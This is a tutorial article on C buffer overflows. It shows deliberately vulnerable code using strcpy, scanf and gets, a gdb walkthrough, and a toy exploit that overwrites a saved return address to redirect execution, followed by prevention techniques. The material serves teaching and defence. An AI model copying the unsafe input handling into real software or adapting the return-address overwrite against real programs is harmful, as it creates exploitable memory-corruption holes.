A buffer overflow occurs when a program or process tries to store more data in a temporary data storage area than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.

By: Suhas Desai

Buffer overflows are a fertile source of bugs and malicious attacks. They occur when a program attempts to write data past the end of a buffer. A buffer is a contiguous allocated chunk of memory, such as an array or a block of memory referenced by a pointer in C. A limitation of C and C++ is that there is no automatic bounds checking on buffers, so a program can write past the end of a buffer, as in the following example.

Note: All examples were compiled on an x86 Linux platform.

  int main(void)
  {
      int buffer[10];

      buffer[20] = 10;   /* index 20 is outside buffer[0..9]: out-of-bounds write */
      return 0;
  }

This program typically compiles and runs without reporting an error, but it attempts to write beyond the memory allocated for the buffer, which results in unexpected behavior.
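
Because the language does not check the index, the program has to do it. The following is a minimal sketch, not part of the original example; the helper name checked_store and its return convention are assumptions made for illustration.

```c
#include <stddef.h>

/* Hypothetical helper: store value at buf[idx] only if idx lies inside
   the array of len elements. Returns 0 on success, -1 if rejected. */
int checked_store(int *buf, size_t len, size_t idx, int value)
{
	if (buf == NULL || idx >= len)
		return -1;	/* out of bounds: nothing is written */
	buf[idx] = value;
	return 0;
}
```

With the array from the example above, checked_store(buffer, 10, 20, 10) is rejected instead of writing past the end of the array.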

Example:

	#include <string.h>

	void function(char *str)
	{
		char buffer[16];

		strcpy(buffer, str);	/* no bounds check: copies all 27 bytes */
	}

	int main(void)
	{
		char *str = "I am greater than 16 bytes";

		function(str);
		return 0;
	}
 

This program is guaranteed to cause unexpected behavior, because a string (str) of 27 bytes is copied to a location (buffer) that has room for only 16 bytes. The extra bytes run past the buffer and overwrite the space allocated for the saved frame pointer (FP), the return address and so on, which corrupts the process stack. The function used to copy the string is strcpy, which performs no bounds checking. Using strncpy with a limit of sizeof(buffer) would have prevented this corruption of the stack, although strncpy does not add the null terminator when it truncates, so the caller has to terminate the buffer itself.
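
A bounded copy along these lines might look as follows. This is only a sketch: the helper name copy_bounded and its return values are assumptions, not something the original program defines.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy src into dst (dstsize bytes) without
   overflowing. Returns 0 if src fit, -1 if it had to be truncated. */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
	if (dstsize == 0)
		return -1;
	strncpy(dst, src, dstsize - 1);	/* writes dst[0] .. dst[dstsize - 2] only */
	dst[dstsize - 1] = '\0';	/* strncpy does not terminate on truncation */
	return strlen(src) < dstsize ? 0 : -1;
}
```

Called with a 16-byte buffer and the 27-byte string from the example, the helper keeps the first 15 characters, terminates the buffer and reports the truncation to the caller.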

Example:

	#include <stdio.h>

	int main(void)
	{
		char buff[15] = {0};

		printf("Enter your name:");
		scanf("%s", buff);	/* no field width: input length is unchecked */
		return 0;
	}

In this example, the program reads a string from the standard input but does not check the string's length. If the string has more than 14 characters, it causes a buffer overflow, because scanf() writes the remaining characters past the end of buff.

Note: One character is always reserved for a null terminator.
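
The scanf() family accepts a maximum field width in the conversion, which caps the number of characters stored. The sketch below uses sscanf() so that it can be run without terminal input; the same "%14s" conversion works with scanf(). The helper name parse_name is an assumption made for illustration.

```c
#include <stdio.h>

/* Hypothetical helper: read one whitespace-delimited word from input
   into a 15-byte buffer. The width 14 leaves room for the terminator.
   Returns 1 if a word was stored, 0 otherwise. */
int parse_name(const char *input, char buff[15])
{
	return sscanf(input, "%14s", buff) == 1;
}
```

Input beyond 14 characters is simply not stored, so buff always ends with its null terminator inside the array.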

The result is most likely a segmentation fault that crashes the program. Under certain conditions, the user receives a shell prompt after the crash. Even if the shell has restricted privileges, the user can examine the values of environment variables, list the files in the current directory, or probe the network with the ping command.

Writing Buffer Overflow exploits:

1. Example of an exploitable program - Let's assume that we want to exploit a function like this:

#include <stdio.h>

void lame(void)
{
	char small[30];

	gets(small);		/* reads a line of any length into 30 bytes */
	printf("%s\n", small);
}

int main(void)
{
	lame();
	return 0;
}

Compile and disassemble it:

# cc -ggdb program.c -o program
/tmp/cca017401.o: In function `lame':
/root/program.c:1: the `gets' function is dangerous and should not be used.

# gdb program


/* short explanation: gdb, the GNU debugger 
   is used here to read the
   binary file and disassemble it (translate 
   bytes to assembler code) */


(gdb) disas main
Dump of assembler code for function main:
0x80484c8 <main>:      pushl  %ebp
0x80484c9 <main+1>:    movl   %esp,%ebp
0x80484cb <main+3>:    call   0x80484a0 <lame>
0x80484d0 <main+8>:    leave
0x80484d1 <main+9>:    ret


(gdb) disas lame
Dump of assembler code for function lame:


/* saving the frame pointer onto the stack 
   right before the ret address */


0x80484a0 <lame>:      pushl  %ebp
0x80484a1 <lame+1>:    movl   %esp,%ebp


/* enlarge the stack by 0x20 or 32 bytes. our buffer
   is 30 characters, but the memory is allocated
   4byte-wise (because the processor uses 32bit
   words). this is the equivalent to: char small[30]; */
0x80484a3 <lame+3>:    subl   $0x20,%esp


/* load a pointer to small (the space on the
   stack, which is located at 0xffffffe0(%ebp),
   that is, 0x20 bytes below %ebp) on the stack,
   and call the gets function: gets(small); */


0x80484a6 <lame+6>:    leal   0xffffffe0(%ebp),%eax
0x80484a9 <lame+9>:    pushl  %eax
0x80484aa <lame+10>:   call   0x80483ec <gets>
0x80484af <lame+15>:   addl   $0x4,%esp


/* load the address of small and the address of the "%s\n"
   string on the stack and call the printf function:
   printf("%s\n", small); */

0x80484b2 <lame+18>:   leal   0xffffffe0(%ebp),%eax
0x80484b5 <lame+21>:   pushl  %eax
0x80484b6 <lame+22>:   pushl  $0x804852c
0x80484bb <lame+27>:   call   0x80483dc <printf>
0x80484c0 <lame+32>:   addl   $0x8,%esp

/* get the return address, 0x80484d0, from stack 
  and return to that address. you don't see that 
  explicitly here because it is done by the CPU 
  as 'ret' */

0x80484c3 <lame+35>:   leave
0x80484c4 <lame+36>:   ret

End of assembler dump.

1.a. Overflowing the program

# ./program
xxxxxxxxx <- user input
xxxxxxxxxxxxx
Segmentation fault (core dumped)
# gdb program core
(gdb) info registers
eax: 0x24        36
ecx: 0x804852f   134513967
edx: 0x1         1
ebx: 0x11a3c8    1156040
esp: 0xbffffdb8  -1073742408
ebp: 0x787878    7895160

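EBP is 0x787878, which means that we have written more data on the stack than the input buffer could hold; 0x78 is the hexadecimal representation of 'x'. The buffer occupied at most 32 bytes on the stack. We wrote more data into memory than was allocated for user input and thereby overwrote the saved EBP, which sits directly above the buffer, with 'x' characters. The value 0x787878 corresponds to three 'x' bytes followed by the terminating null byte, so in this run the overflow stopped just short of the return address; a few more input bytes would have overwritten it as well. When the process later used the corrupted EBP as a stack address, the access to the invalid address 0x787878 caused a segmentation fault.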
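
The arithmetic behind this can be sketched in a few lines. The layout constants below are taken from the disassembly (32 bytes reserved for small, then the saved EBP, then the return address); the helper name furthest_overwrite and the enum names are assumptions made for illustration.

```c
#include <stddef.h>

/* Assumed layout from the disassembly: 32 bytes reserved for small,
   then 4 bytes of saved EBP, then 4 bytes of return address. */
enum { BUF_BYTES = 32, SAVED_EBP_BYTES = 4, RET_BYTES = 4 };

enum overwrite { NOTHING, SAVED_EBP, RETURN_ADDRESS };

/* Hypothetical helper: report the furthest stack slot that gets()
   reaches for an input of input_len characters. gets() stores the
   characters plus one terminating null byte. */
enum overwrite furthest_overwrite(size_t input_len)
{
	size_t written = input_len + 1;	/* characters + '\0' */

	if (written > BUF_BYTES + SAVED_EBP_BYTES)
		return RETURN_ADDRESS;
	if (written > BUF_BYTES)
		return SAVED_EBP;
	return NOTHING;
}
```

Under this assumed layout, an input of 35 'x' characters would leave the bytes 0x78 0x78 0x78 0x00 in the saved EBP slot, which a little-endian x86 reads back as 0x787878, while 36 or more characters would start to reach the return address.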

1.b. Changing the return address

Let's try to exploit the program so that it returns to the call to lame() instead of returning normally. We have to change the return address from 0x80484d0 to 0x80484cb, that is all. In memory, we have: 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET. Here is a simple program that writes the 4-byte return address repeatedly into a buffer of 1-byte characters:

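#include <stdio.h>
#include <string.h>

int main(void)
{
	unsigned int ret = 0x80484cb;	/* address of the call to lame() in main() */
	char buf[45];
	int i;

	/* fill the buffer with 11 copies of the 4-byte address */
	for (i = 0; i < 44; i += 4)
		memcpy(&buf[i], &ret, 4);
	buf[44] = '\0';			/* puts() needs a terminated string */
	puts(buf);
	return 0;
}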

# ./program
test		 <- user input
test

Here the program went through the function two times. If an overflow is present, the return address of a function can be changed to alter the program's flow of execution.

Prevention:

1. Always check the bounds of an array before writing it to a buffer. If this is not possible [e.g. when the input is coming from a CGI script], then use functions that limit the number of input characters. For instance, instead of using scanf(), use the fgets() function, which reads characters up to a specified limit.

Example:

	#include <stdio.h>

	int main(void)
	{
		char buff[15] = {0};

		fgets(buff, sizeof(buff), stdin);	/* reads at most 14 characters */
		return 0;
	}
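
In practice fgets() keeps the newline it reads and returns NULL at end of file, so a small wrapper is often convenient. The following is a sketch only; the helper name read_line is an assumption, and it assumes size fits in an int.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: read one line from in into buf (size bytes),
   dropping the trailing newline that fgets() keeps.
   Returns 0 on success, -1 on end of file or read error. */
int read_line(FILE *in, char *buf, size_t size)
{
	if (fgets(buf, (int)size, in) == NULL)
		return -1;
	buf[strcspn(buf, "\n")] = '\0';	/* no-op if the line was truncated */
	return 0;
}
```

A line longer than the buffer is not lost: the characters that did not fit stay in the stream and are returned by the next call.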

2. Additionally, the standard string functions have versions that take an explicit size limit. Thus, instead of strcpy(), strcmp() and sprintf(), use strncpy(), strncmp() and snprintf() respectively.
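
As an illustration of the size-limited variants, snprintf() returns the length the full output would have had, which makes truncation easy to detect. This is a minimal sketch; the helper name format_greeting and the message text are assumptions.

```c
#include <stdio.h>

/* Hypothetical helper: format a greeting into dst (size bytes).
   snprintf() never writes more than size bytes and terminates the
   result when size > 0. Returns 0 if the whole text fit, -1 if it
   was truncated or an error occurred. */
int format_greeting(char *dst, size_t size, const char *name)
{
	int needed = snprintf(dst, size, "Hello, %s!", name);

	if (needed < 0 || (size_t)needed >= size)
		return -1;
	return 0;
}
```

With a 10-byte destination and the name "world", the call stores only the first nine characters plus the terminator and returns -1, so the caller knows the output is incomplete.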

3. Stack execute invalidation:

With this approach the stack is marked non-executable, so any attempt to execute code residing on the stack causes a segmentation violation. This solution is not easy to implement, however. Although it is possible on Linux, a few compilers use trampoline functions to implement taking the address of a nested function, and these rely on the system stack being executable. A trampoline is a small piece of code created at run time when the address of a nested function is taken. It normally resides on the stack, in the stack frame of the containing function, and thus requires the stack to be executable.

4. Dynamic run-time checks:

This method primarily relies on safety code being preloaded before an application is executed. This preloaded component can either provide safer versions of the standard unsafe functions, or it can ensure that return addresses are not overwritten. The libsafe library provides secure calls to these functions, even if the function is not available. It makes use of the fact that stack frames are linked together by frame pointers. When a buffer is passed as an argument to any of the unsafe functions, libsafe follows the frame pointers to the correct stack frame. It then checks the distance to the nearest return address, and when the function executes, it makes sure that the address is not overwritten.
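
The distance check can be illustrated with a simulated stack frame. The sketch below models the idea only and is not libsafe's code: the struct fake_frame layout and the function name frame_checked_strcpy are assumptions, and a real implementation would walk the actual frame pointers rather than use a struct.

```c
#include <stddef.h>
#include <string.h>

/* Simulated stack frame: a local buffer followed by the saved frame
   pointer and the return address (assumed 32-bit layout). */
struct fake_frame {
	char buffer[32];
	unsigned char saved_fp[4];
	unsigned char ret_addr[4];
};

/* Hypothetical checked copy: the distance from the buffer to the saved
   frame pointer is the most that may be written. Returns 0 on success
   and -1 (copying nothing) if src would reach the saved values. */
int frame_checked_strcpy(struct fake_frame *frame, const char *src)
{
	size_t limit = offsetof(struct fake_frame, saved_fp);
	size_t needed = strlen(src) + 1;	/* include the terminator */

	if (needed > limit)
		return -1;
	memcpy(frame->buffer, src, needed);
	return 0;
}
```

A 40-character input is refused before any byte is copied, so the simulated saved frame pointer and return address keep their values.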

Biography:


Suhas A Desai is an undergraduate Computer Engineering student at Walchand CE Sangli, MS, India. He has written "Biometrics Security with Smart Card in Linux", which was published in ISA EXPO 2004, IEEE Real-Time and Embedded Technology and Applications Symposium, CA, USA, InTech Journal, TX, USA, and e-SMART 2005, France. His research areas include Linux security, networking, and Linux kernel internals.